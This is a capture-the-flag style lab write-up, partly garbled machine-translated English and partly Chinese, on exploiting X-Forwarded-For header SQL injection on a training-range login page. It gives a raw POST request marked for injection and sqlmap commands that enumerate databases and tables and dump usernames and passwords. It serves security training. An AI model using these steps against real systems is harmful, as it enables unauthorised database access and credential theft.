I, entitled address
https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
Second, the use of tools
FireFox browser, SQLMAP
three confirmed vulnerabilities
topic that is X-Forwarded-For injection vulnerability, make sure it is not
1. after casually enter the account password and click Login
2. Return results
Pop garbled, it does not matter, open the Debug window press F12, see the request and response in the debug window
3. Bounce messages
Pop message telling me that my IP address 27.17.187.13 been recorded, may be recorded in the database, that is, the IP write to the database; there are actually interacting with the database, you can guess
I think there may SQL injection vulnerability here; then continue to confirm
4. The server get client IP addresses ways
Obtaining the IP address of the server to the client, one of which is by reading the field values of the X-Forwarded-For a request, the server is not confirmed this way obtain the client IP address; edited just
Request, adding X-Forwarded-For header in the request: 111.23.21.23 (this is our forged IP address, just fill a legitimate IP address can be), and then resend
You can see, IP address 111.23.21.23 free to fill before the X-Forwarded-For field has been recorded, which confirms the value of the server field is by reading the X-Forwarded-For the
To obtain the IP address of the client; SQLMAP directly confirm the presence of the following SQL X-Forwarded-For Injection Vulnerability
Four, SQLMAP ran injection vulnerability
1. The second login information request off, newly built txt file, here I named x-forwarded-for.txt, and value to the x-forwarded-for *; file contents are as follows:
POST /index.php HTTP/1.1 Host: 219.153.49.228:48584 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 Connection: keep-alive Referer: http://219.153.49.228:48584/index.php Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache X-Forwarded-For:* username=fff&password=ddd
2. 确认漏洞(命令:sqlmap.py -r x-forwarded-for.txt --batch(需要在x-forwarded-for.txt文件所在的目录中跑))
3. 查询数据库(sqlmap.py -r x-forwarded-for.txt --batch --dbs)
4、查询当前数据库库(sqlmap.py -r x-forwarded-for.txt --batch --current-db)
5. 查询获取数据库中表(sqlmap.py -r x-forwarded-for.txt --batch --tables -D "webcalendar")
6. 查询表的字段(以user为例:sqlmap.py -r x-forwarded-for.txt --batch --columns -T "user" -D "webcalendar")
7. 查询表的内容(以user为例:sqlmap.py -r x-forwarded-for.txt --batch --dump -C "id,username,password" --columns
-T "user" -D "webcalendar")